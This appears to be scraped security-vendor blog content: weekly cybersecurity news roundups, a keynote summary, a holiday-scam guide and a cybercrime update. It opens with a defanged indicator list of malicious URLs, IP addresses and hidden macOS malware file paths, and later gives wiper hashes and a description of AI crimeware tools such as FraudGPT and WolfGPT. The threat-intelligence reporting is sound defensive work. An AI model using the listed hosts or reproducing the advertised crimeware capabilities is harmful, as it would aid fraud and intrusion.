Network Communications

http[:]//docs-send.online/getBalance/usdt/ethereum
https[:]//drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2
http[:]//on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D
http[:]//tp-globa[.]xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC
http[:]//swissborg[.]blog/zxcv/bnm

23.254.226[.]90
104.168.214[.]151
142.11.209[.]144
192.119.64[.]43

File paths

/Applications/Discord.app/Contents/MacOS/.log
/Applications/Discord.app/Contents/MacOS/appname
/Library/Caches/com.apple.safari.ck
/tmp/tempXXXXXX
/Users/Shared/.pld
/Users/Shared/.pw
/Users/Shared/.sld

The Good, the Bad and the Ugly in Cybersecurity – Week 47

The Good | FTC Launches Series of Proactive Steps to Bolster U.S. Cybersecurity Efforts

Responding to an ever-evolving cyber threat landscape, the Federal Trade Commission (FTC) has unveiled two security initiatives, consolidating efforts to strengthen cyber defense measures and protect U.S. consumers.

Most recently, the FTC’s proactive stance extended into the realm of artificial intelligence (AI). Recognizing the emerging threat of AI-driven fraud and extortion through voice cloning, the FTC this week announced a Voice Cloning Challenge. This challenge serves as an innovative approach to encourage new ideas and technologies capable of detecting and mitigating the risks associated with voice cloning and AI manipulation. By fostering collaboration and incentivizing solutions spanning “product, policy, or procedures”, the FTC demonstrates a commitment to staying ahead of technological advancements and safeguarding consumers from developing and sophisticated cyber threats.

Last week, the FTC proposed a new cyber disclosure rule after a data breach hit a Virginia-based prison. Reports say that Global Tel* Link Corp., a prison communications provider, failed to secure the sensitive information of incarcerated individuals and then neglected to notify all victims post-breach. After personal information of some 650,000 users were copied into a cloud service, it was left unencrypted with no firewall nor any access management software. Forensic analysis later revealed that billions of bytes of data was exposed to the attacker with some making it onto the dark web. Due to a 9-month delay by Global Tel* Link Corp., thousands of inmates were unable to obtain credit freezes and take necessary precautions. The FTC is now requiring such providers and its subsidiaries to create new data security programs focused on minimizing human errors, implementing MFA, and notifying all affected users and facilities of future data breaches within 30 days.

The Bad | Rhysida RaaS Claims Responsibility For Cyberattack on British Library

Days before Halloween, the British Library was hit with a major IT outage, affecting its online systems and services, website and onsite services following a cyberattack. Last Friday, the institution confirmed that they had suffered a ransomware attack and that the library’s many services continued to be afflicted.

In a disturbing turn, the Rhysida ransomware gang claimed responsibility for the attack this week and is now auctioning off stolen data from the national library’s systems. The gang is soliciting bids over the course of a week, presenting a low-resolution screenshot of purportedly stolen ID scans as ‘proof’ of stolen data. Both the FBI and CISA have issued a joint warning about the opportunistic nature of Rhysida’s attacks that emphasize the far-reaches of its Ransomware-as-a-Service (RaaS) model.

Source: Security Affairs

The Rhysida ransomware group was first observed in May 2023, following the emergence of their victim ‘support’ chat portal hosted on Tor. According to the FBI and CISA, the group is focused on “targets of opportunity” across all critical sectors. Their RaaS model allows Rhysida to lease out ransomware tools and infrastructure leading to profit shares being split between the group and any affiliates.

In response to the data leak, the British Library has confirmed the compromise of HR documents and advised users to reset passwords as a precautionary measure. While evidence suggests leaked HR information, the library asserts no indication of broader user data compromise so far. To date, the British Library sees more than 11 million visitors to their website annually and over 16,000 users accessing both onsite and digital collections of over 150 million items. The ongoing issues stemming from this attack zeros in on much-needed defense of critical cultural and national institutions against persistent threat groups targeting organizations of opportunity.

The Ugly | Sensitive PII Leaked Online After U.S. Nuclear Energy Center is Breached

The 5,700-strong workforce of Idaho National Laboratory (INL) fell victim to a cyberattack this week when the contents of their HR database were leaked online. INL is a nuclear research center housing 50 experimental reactors operated by the U.S. Department of Energy. The center holds a vast portfolio, being involved in research on nuclear waste processing, robotics, bioenergy, advanced vehicle testing, light water reactors, and more. This is the latest attack on U.S. critical sectors; a growing trend where threat actors seek to compromise many through a single entity and leverage sensitive data for exuberant ransoms.

After gaining access to INL servers supporting the research center’s Oracle HCM system, the data breach was claimed by a hacktivist group called ‘SiegeSec’, already known in the cyber threat arena for their previous attacks on NATO and Atlassian. Consistent with their past breaches, SiegeSec took to various hacker forums and their Telegram channel to post stolen data from allegedly “hundreds of thousands” of employees, system users, and citizens.

Source: BleepingComputer

While INL has yet to release an official statement on the incident, a spokesperson has acknowledged the breach, confirming support from federal law enforcement agencies, including the FBI and CISA, and that investigations are underway. Affected employees have been told to freeze their credit, monitor financial accounts, and update critical passwords.

The attack on INL follows similar breaches from earlier this year where a Russian-based hacking group dubbed ‘Cold River’ targeted three American nuclear labs: Brookhaven (BNL), Argonne (ANL), and Lawrence Livermore National Laboratories (LLNL). Though SiegedSec has not disclosed any data related to INL’s nuclear research as of this writing, the incident underscores the heightened concerns around protecting U.S. critical infrastructure and essential services against advancing cyber threats.

The Physics of Information Asymmetry | Juan Andrés Guerrero Saade’s Keynote at VB2023

At this year’s VirusBulletin conference, VB2023, SentinelOne’s Juan Andrés Guerrero Saade, a.k.a. JAGS, Associate Vice President of SentinelLabs delivered a keynote speech calling for a reevaluation of the conventional understanding of the cybersecurity sector. His talk, “The Physics of Information Asymmetry” challenged us to reconsider and reinterpret the fundamental concepts and language of our discipline.

Redefining the Language of Cybersecurity | A Critical Analysis

Juan Andrés opened the talk by critiquing the reliance on military and intelligence metaphors in cybersecurity. This borrowed lexicon, while providing a foundational language in the discipline’s infancy, has, over time, led to a narrowed perspective.

JAGS argued that terms like ‘cyber attack’ and ‘cyber domain,’ are rooted in a militaristic worldview and limit our strategic approach to digital defense. Are we, as cybersecurity professionals, constrained by the language we use? How would our strategies change if we broke free from these traditional paradigms?

Decoding Information Asymmetry

A central theme of the keynote was the concept of information asymmetry between attackers and defenders. This imbalance is not merely a tactical disadvantage but a core characteristic that shapes the landscape of cyber conflict.

Juan Andrés elaborated on how this asymmetry transcends mere knowledge gaps and engenders differing perceptions, capabilities, and intents. He challenged the audience to think beyond the conventional ‘cat and mouse’ game and consider the broader implications of this asymmetry. How does it influence our approach to defense? What new strategies could emerge if we fully understood and redefined cybersecurity in terms of information asymmetry?

Rewriting Cybersecurity Metaphors | A Call for Conceptual Revolution

There are no simple solutions when addressing such foundational issues, but the industry can only move forward by rising to the challenge. Juan Andrés advocates for a complete overhaul of the metaphors underpinning cybersecurity. Drawing from diverse fields like physics and information theory, he suggested that adopting new metaphors could lead to more effective and nuanced cybersecurity strategies.

This metaphorical shift isn’t merely semantics but a fundamental rethink of how we conceptualize cyber threats and defenses. What new models and frameworks could we develop if we freed ourselves from the current paradigms?

Leveraging External Expertise | Broadening Our Cybersecurity Horizon

Central to this new approach was the need to untap the potential of integrating insights from adjacent fields into cybersecurity. The industry as it now stands is unique in being insulated from valuable contributions from related disciplines such as information theory, control theory, complex adaptive systems, and statistics. This is a situation that must change if we are to evolve our practice and knowledge, and ultimately defend organizations more successfully.

An interdisciplinary approach, JAGS suggested, could unlock new perspectives and solutions, propelling our understanding of cybersecurity challenges to new heights. What innovative approaches might emerge from such collaborations? How can insights from these fields enrich our strategies and tools?

Conclusion | Charting a New Course in Cybersecurity

Juan Andrés Guerrero Saade’s keynote at VB2023 offered a compelling perspective on the future of cybersecurity. A thoughtful critique of current practices, it suggested a need for a shift in how we understand and tackle digital threats. The call to integrate ideas from various fields challenges us to think differently about how we conceptualize our discipline and what that means for its accessibility to others.

Black Friday & Cyber Monday | A Guide to Avoiding Cyber Scams During the Holidays

As the virtual doors of e-commerce swing open for a weekend bookended by Black Friday and Cyber Monday deals and discounts, the bustling online market provides many avenues for phishing attacks, emails scams, malicious websites, and more. Even vigilant shoppers are more vulnerable during this time of year as it is an opportune time for credit card fraud and identity theft, which adds another layer of risk.

For businesses, the holiday season means security teams have to step up their vigilance in an effort to counter fraudsters and protect both the business and customers.

This blog post delves into the most common cyber threats that emerge during the holiday rush and provides useful tips to help both shoppers and businesses ensure a safe and secure holiday online experience.

Holiday-Based Threats in the eCommerce Landscape

Ahead of the festive season, authorities are already cautioning eager bargain hunters about the risks that come with shopping online.

The National Cyber Security Centre (NCSC), part of the UK’s intelligence agency, warned that cybercriminals this year may leverage AI technology to create more convincing scam content, malicious adverts, and spoofed websites.

Similarly, the Canadian RCMP have also sent out cybersecurity tips for a safer holiday season, offering ways people can protect their personal and financial information while buying online.

The FBI and CISA this year released a cybersecurity advisory urging businesses to stay vigilant against the spike of ransomware campaigns that occur during holidays and long weekends when offices are usually closed or operating with a leaner workforce. Threat actors continue to leverage widely-celebrated holidays to get a head start on conducting impactful attacks.

Top Scams to Watch Out for This Cyber Week

Cyber Week, the shopping period made up of Thanksgiving, Black Friday, Small Business Saturday, and Cyber Monday, broke eCommerce records last year. On Cyber Monday only, consumers drove $11.3 billion in online sales and a whopping $35.3 billion in total for the entire holiday season. According to reports, mobile shopping, buy-now-pay-later incentives, curbside pickup, and discounts in the face of growing global inflation all contributed to the skyrocketing shopping rates.

While online retailers continue to make bank during Cyber Week, businesses and shoppers alike are increasingly impacted by cyber attackers all waiting for the biggest online shopping events of the year. Here are the most commonly used threat tactics and how to guard against them.

Email Scams & Social Engineering

Email phishing scams are a prevalent threat, involving deceptive messages that appear as legitimate promotional offers or urgent notifications. These are designed to trick recipients into revealing sensitive information or tempt them into downloading malware. Social engineering plays a pivotal role, manipulating shoppers to divulge personal details or click on malicious links.

Email scams often involve gift card fraud with scammers coercing victims to purchase gift cards under the guise of resolving issues, subsequently taking off with the funds. Fake order confirmations are also common during the holiday season, often including convincing logos and graphics to trick shoppers into clicking on malicious links thinking they are contacting customer support to dispute the non-existent purchase.

Social media platforms are also breeding grounds for scams during Cyber Week, with fake advertisements, pyramid schemes disguised as gift exchange games, and too-good-to-be-true deals leading users to spoofed websites.

How To Stay Safe

To safeguard against these threats, vigilance and good cyber hygiene are prerequisites:

  • Operate with caution as a default – Verify incoming emails and messages and avoid clicking on suspicious links. Check that the sender’s email address is correct, look for official branding, and be aware of the tone of the message.
  • Don’t rush to respond – Scammers like to send fake confirmations for expensive goods or services, or claim the recipient has been or will be charged for something they never ordered. The ploy is to instill a sense of urgency and encourage the intended victim to click a malicious link. For any unexpected communication that implies some form of payment is due or forthcoming, verify its legitimacy through official channels rather than relying solely on email notifications.
  • Be wary of gift card scams – When confronted with requests for gift card purchases, check the request through a trusted source.
  • Inform and stay informed – Knowledge is power, and in a connected world, we are all part of the solution. Keep up to date with blogs and social media accounts from state and local authorities, which often post warnings and spikes, and share with others. The more people are aware of scams the less successful they are.
  • Report suspicious activities – If you think you may have fallen victim to a scam, it’s important both to report it to relevant authorities and organizations such as your employer or your bank and to take action quickly. Reset passwords where necessary and enable multi-factor authentication (MFA).

Spoofed Websites, Malvertising & E-Skimming

Major Cyber Week discounts create a prime hunting ground for threat actors employing sophisticated techniques such as spoofed websites, malvertising, and e-skimming to exploit unsuspecting shoppers.

Spoofed websites mimic legitimate online retailers, leading users to unwittingly share personal and financial information. Malvertising infiltrates legitimate advertising networks, placing malicious ads on seemingly trustworthy websites and compromising the user’s device upon interaction. E-skimming involves the malicious injection of code into online payment forms, enabling cybercriminals to intercept and steal sensitive payment information during transactions.

How To Stay Safe

To shield against these threats:

  • Double-check website URLs – Does that website address look correct? Check for legitimacy, ensuring web addresses match the official domain of the retailer.
  • Ensure a vendor has secure payment methods in place – Don’t enter personal or financial information in web forms that are not clearly secure. Check that the URL of the site is prefixed with “HTTPS” and look for trust seals or security badges, including those from SSL certificate providers and payment processes. Also, reputable online vendors typically offer a variety of secure payment options. Look for familiar and trusted payment methods such as credit cards, PayPal, or other well-known processors.
  • Consider payment options carefully – Use credit cards or pre-paid credit or debit cards to purchase items. Avoid paying by bank transfer as money sent this way is unrecoverable.
  • Block the spam – Install reputable ad blockers to mitigate the risks of malvertising, blocking potentially harmful ads.

Credit Card & Identity Fraud

Threat actors take advantage of the hustle and bustle of the holiday period to steal credit card details and digital identities. Credit card fraud involves the unauthorized use of credit card information for illicit transactions, often through compromised online platforms. Identity fraud, on the other hand, entails the theft of personal information to impersonate individuals for fraudulent activities.

Magecart malware, for example, is a malicious script that infiltrates and compromises eCommerce websites to harvest sensitive information, primarily credit card details and other personal data.

The malware intercepts and captures user input, such as credit card information entered during online transactions, without the knowledge of the website owner or the unsuspecting users. The harvested data is then exfiltrated to remote servers controlled by cybercriminals, who can exploit it for various fraudulent activities, including unauthorized transactions and identity theft.

How to Stay Safe

To protect against credit card and identify fraud:

  • Use secure and reputable payment methods – Prepaid credit cards, gift vouchers or gift cards, PayPal, Apple Pay, Google Pay, or Amazon Pay reduce the need to share bank details directly when making online purchases.
  • Use retailer apps where available – Many reputable retailers have their own apps allowing users to shop and pay directly through the mobile app.
  • Monitor bank statements regularly – Be alert for suspicious transactions and set up transaction alerts that can aid in early detection of unauthorized activity.
  • Be cautious about sharing personal information – Only provide personal information to trusted and verified sources.
  • Implement strong, unique passwords – never reuse passwords and use a password manager to test password strength. Make sure passwords aren’t simple variations on common phrases.
  • Develop situational awareness – Refrain from using public Wi-Fi for financial transactions, or typing sensitive passwords in public places, such as cafes, bars and restaurants that may be over-looked by CCTV.

Protecting Online Shoppers | What eRetailers Can Do

As the digital marketplace intensifies during events like Black Friday or Cyber Monday, eCommerce retailers will look to  fortify their websites and enhance their cybersecurity posture to ensure the safety of their online shoppers. While security measures are a year-round endeavor, business leaders and security teams can use the following checklist to do a routine check on their systems ahead of the holiday rush.

  • Ensure data security – Robust encryption protocols, such as Transport Layer Security (TLS), Perfect Forward Secrecy (PFS), or HTTP Strict Transport Security (HSTS), helps secure data transmitted between users and the website.
  • Review and respond – Threat actors change tactics frequently and rapidly, and new software bugs are quickly exploited. Regular security audits and vulnerability assessments can identify and patch potential weaknesses in the website’s infrastructure, blocking potential entry points for cyber attackers.
  • Leverage modern defenses – eCommerce businesses should invest in advanced firewalls, intrusion detection systems (IDSs), and monitoring solutions to detect and prevent unauthorized access or malicious activities.
  • ‘Patch early, patch often’ is still good advice – Keeping software, plugins, and third-party integrations up to date is crucial to minimize the risk of exploitation by cyber threats.
  • Develop a culture of awareness – Regular employee training on cybersecurity best practices, including recognizing and avoiding phishing attempts, contributes to a more vigilant workforce.
  • Guard the tradesman’s entrance – Carefully vet and monitor third-party vendors, ensuring that they adhere to strict security standards and are also ready for the holiday season.
  • Prepare for the rush – Ahead of the sales season, load testing and performance monitoring are essential to ensure that the website can handle increased traffic without compromising security.
  • Know how to react – A robust incident response plan (IRP) should also be in place, detailing the mitigation steps and communication plans to be followed in the event of a breach.

Conclusion

From email scams and social engineering to spoofed websites and malvertising, the eCommerce landscape is rife with potential threats, especially during the most festive time of year. The surge in online activities, especially during Cyber Week, attracts not only eager shoppers but also opportunistic cyber threat actors aiming to exploit the spike in traffic.

For businesses, fortifying endpoint security involves implementing advanced detection and monitoring solutions, regularly updating software, and enforcing strict access controls. Protecting sensitive data demands comprehensive identity security measures, including MFA and user behavior analytics.

Shoppers, too, play a pivotal role in their own online safety. Utilizing secure and updated devices, being wary of phishing attempts, and ensuring secure connections during transactions are essential for the upcoming long weekend. Adopting strong, unique passwords for each online account and enabling MFA adds an extra layer of defense against unauthorized access. Regularly monitoring bank statements for suspicious transactions is a proactive step that can help detect and mitigate potential fraud.

Businesses strengthening their platforms this season rely on SentinelOne’s AI-powered security platform to defend against today’s most advanced threats. Covering multiple attack surfaces, learn more about the market’s leading cybersecurity solution by contacting us today or booking a demo.

Nov 2023 Cybercrime Update | LLMs, Ransomware and Destructive Wipers Proliferate in Recent Attacks

In this blog post, we delve into the notable trends shaping the cyber threat landscape over the past month. Hot topics this month revolve around the expanding use of generative AIs by cybercriminals, the ongoing surge of ransomware campaigns, and the latest developments in cyber warfare related to the Israel-Hamas war.

Crimeware Scene Continues to Explore Advantages of LLMs

AI-centric tools and services continue to emerge, with a number of notable developments since our October 2023 update. Though a relatively new market for threat actors, the types of services on offer are evolving quickly.

One tool that has emerged in recent weeks is FraudGPT, which advertises itself as “Not just a GPT LLM, but an all inclusive, testing, cracking, action and access tool” with the ability to “Generate scam emails, identify malicious code, and uncover leaks and vulnerabilities in seconds”.

Combining the GPT LLM with other tools allows powerful potential for automated havoc. For example, FraudGPT includes integration with an expanding CVE database. This allows attackers to check whether targets are vulnerable to any known software bugs, allowing them to tailor their operation via simple text-based prompts.

FraudGPT

For cybercriminals, the cost is not prohibitive. One FraudGPT seller offers varied subscription options ranging from 89.003 euros per month to 749.00 euros “Lifetime Pro” options. Customized private builds are also advertised at prices starting at 1899.99 euros.

WolfGPT is another tool for sale offering similar functionality. Its feature set includes:

  • Generation of malware and ransomware
  • Automated writing of scam emails
  • Automated writing of “fake news and misinformation”
  • Vulnerability discovery
  • Multiple AI models
  • Unlimited Characters
  • Privacy and performance focused

So-called “Lifetime” licenses for the current version of WolfGPT go for USD $300.

WolfGPT
WolfGPT

Ransomware Hits Financial, Education and Healthcare Sectors

China’s largest Bank, ICBC, was extorted by LockBit, it was reported this month. The attack on the Industrial and Commercial Bank of China is notable given the sheer size and ‘position in the world economy’ that the ICBC holds. According to sources, the ICBC’s U.S. unit was impacted to such an extent that trades representing “billions of US dollars” had to be conducted by transferring information on USB sticks as its computer systems were isolated from the rest of Wall Street.

Elsewhere, an attack on the Toronto Public Library has been attributed to Black Basta ransomware group. The attack is said to have led to “significant disruptions” as all internal systems went down in response to the incident.

In early November 2023, JAE (Japan Aviation Electronics) was targeted by ALPHV (aka BlackCat).

ALPHV and JAE
ALPHV and JAE

Among other attacks attributed to the ALPHV group this month is a claim to have infiltrated Dragos, a cybersecurity provider focused on industrial control systems.

ALPHV and Dragos Inc
ALPHV and Dragos Inc

Confirmation of this attack remains uncertain at the time of writing. A post briefly appeared on the ALPHV blog on November 11, 2023 claiming that Dragos had been breached, but that has since been removed.

In September’s update we reported on the activities of Ransomed.VC. This group has now ceased operations. The developer(s) posted on Telegram and other forums claiming that:

“The project ransomedvc is up for sale…I do not want to continue running the project due to personal reasons, none will be disclosed to journalists, don’t even ask. We are selling everything”

The operator was asking for USD $10 million for its clearnet and TOR domains, ransomware builders and source, affiliate group access, and social media accounts

However, a subsequent message claimed that members of its group had been arrested and that the entire operation was being shut down due to the risks.

Updated Ransomed.VC statement
Updated Ransomed.VC statement

That said, the operator continues to solicit interest in a new private project via the same Telegram channel, so watch this space.

Israel-Hamas Conflict | Destructive Wipers Begin to Emerge

As we saw during the early stages of the Russian invasion of Ukraine, cyber warfare actors were quick to begin destructive wiper campaigns. A similar trend is now being seen in the Israel-Hamas war.

Between October 30th 2023 and November 2nd 2023, a series of wipers began targeting systems across Israel. The wipers, collectively known as “Bibi” wipers, are designed to resemble ransomware but in fact simply overwrite the victims data, with no possibility of recovery. In some of the early variants seen, affected files are renamed with a .BiBi1 file extension.

Variants for both Linux and Windows systems have been noted. When launched all accessible files are overwritten, including core OS files and data. The malware has an option to allow an attacker to specify a target directory for wiping rather than the entire machine.

SHA1: 24f6785ca2e82d1d1d61f4cb01d5e753f80445cf (VirusTotal)
SHA1: 24f6785ca2e82d1d1d61f4cb01d5e753f80445cf (VirusTotal)

The malware also executes commands designed to prevent interruption of execution and to hinder attempts at recovery through deletion of the system VSS backups.

Additionally, on November 13, 2023, Israeli’s CERT published an alert with details and indicators of further wiper attacks, including the following suspected wiper hashes:

27e28737415e9d6a45b5afb03c7b33038df8f800
44f2e8860e2935e900446dc5dea31508c71701ff
48bc39011e06931b319d873a4d2a0cff5b119cdf

These most recent wipers are attributed to Iranian threat actors (BlackShadow aka DEV-0022).

Conclusion

The cybercrime ecosphere continues to explore the use of LLMs, with more offerings of AI-powered tools designed to lower the barrier to entry into cybercrime and make attacks more efficient. Meanwhile, ransomware actors like LockBit and ALPHV have been actively attacking some big name targets as well as public sector healthcare and education providers. The emergence and deployment of multiple variants of wiper malware, while not entirely surprising, represents a new development in cyber threat activity related to the Israel-Hamas war. As past conflicts have shown, such cyber weapons have a very real possibility of affecting targets far from those initially intended.

In the face of these emerging trends, employing a comprehensive security solution like Singularity XDR, which leverages AI and automated remediation, can serve as a potent weapon in an organization’s cybersecurity arsenal. It’s more crucial than ever to stay ahead of the curve, adopting proactive measures that help detect and mitigate threats before they can inflict significant damage.

To learn more about how SentinelOne can help defend your organization’s endpoint, cloud, and network assets, contact us or request a free demo.

The Good, the Bad and the Ugly in Cybersecurity – Week 46

The Good | FBI Takes Down IPStorm Botnet

A botnet that had been running since 2019 infecting thousands of internet-connected devices around the world has been taken down, the FBI said this week. IPStorm was operated by Sergei Manikin, a Russian and Moldovan national, who has also pleaded guilty to three counts of computer fraud.

Unlike traditional botnets, IPStorm used a peer-to-peer network protocol known as Interplanetary File System (IPFS) to store and share data in a distributed file system, making it more resilient and harder to disrupt. Infected devices were turned into proxies for malicious activity by clients that Manikin sold access to through his public websites proxx.io and proxx.net.

By routing their internet traffic through the botnet, clients could conduct malicious activities anonymously. According to the FBI, customers paid hundreds of dollars a month to rent access to the botnet. Manikin is thought to have had over 23,000 paying customers and admitted to banking at least half a million dollars from the scheme.

ipstorm botnet

Initially targeting Windows systems, over the years IPStorm expanded to targeting most major platforms, including macOS, Linux and Android devices across Asia, Europe and both North and South America, infecting at least 13,500 devices.

In announcing the take down, the FBI said that it had dismantled Manikin’s infrastructure, but their actions did not extend to informing victims or removing the botnet malware from infected devices.

The Bad | Educational Startup Turned Into Cyber Espionage Actor

Research from Reuters and SentinelLabs this week revealed how an educational startup that began life teaching coding skills rapidly transformed into a global cyber espionage threat actor. Reuters revealed how Appin Security Group became a significant player in the Hack-for-Hire business and allegedly engaged in multiple high-profile hacks.

The company, founded by Rajat and Anuj Khare, was formed in 2003, and began as an educational outfit offering technology training courses in programming, robotics and cybersecurity. Between 2009 and 2013, the company was involved in offering offensive security and hack-for-hire operations.

Representatives of the Khare’s have denied engaging in illicit activities; however, researchers say that Appin developed a comprehensive set of hacking tools capable of spying, hacking email accounts and advanced social engineering. High profile operations included targeting Russian oligarch Boris Berezovsky, Malaysian politician Mohamed Azmin Ali, and U.S. House Intelligence Committee Chairman Kristi Rogers.

According to the research, Appin’s success was built on a sophisticated approach to managing and acquiring infrastructure, including purchasing mobile spyware from external contractors as well as developing in-house hacking tools, exploits and malware. The company offered clients an easy-to-use portal where they could make and manage requests for hacking operations.

Source: Reuters

SentinelLabs said that better international cooperation and legal frameworks were needed to effectively address the problem of private sector offensive actors, a market which has burgeoned in recent years in light of advancing technologies and growing demand for digital espionage services. Governments, businesses and high-profile individuals need to proactively protect themselves against such formidable actors.

The Ugly | ALPHV Files SEC Complaint Against Victim

Ransomware actor ALPHV has taken extortion to the next level by filing a complaint against one of its victims with the Securities and Exchange Commission (SEC), MeridianLink, whose data is listed on the ALPHV leak site.

According to reports, representatives of ALPHV say they breached MeridianLink on November 7th, in a data theft operation without ransomware. The attackers say the victim became aware of the breach the same day, but did not inform the SEC within 4 days – a new requirement that has yet to come into force. MeridianLink has since stated that the attack only came to light three days later on November 10th.

It seems unlikely that the complaint – filed under Item 1.05 of Form 8-K – will be upheld. Aside from the fact that MeridianLink disputes the date when it became aware of the breach, the rules are not set to come into effect until December.

It has been reported that MeridianLink was quick to patch the vulnerability used in the breach but has not proceeded with any ransom negotiations to date. The filing of the SEC complaint may be an attempt to generate more publicity about the breach, putting pressure on the victim by way of raising concerns about the stolen data among its clients and partners.

The incident underscores the lengths threat actors will go to achieve a payout. Extortion of businesses that fail to adequately secure their networks has developed rapidly since the initial phase of ransomware as simple file lockers. Data exfiltration and double extortion through leveraging public perception is the new playbook. Bringing regulatory compliance into the mix may be a little premature in this case, but the message to businesses should be clear: prevention is the primary cure in enterprise security.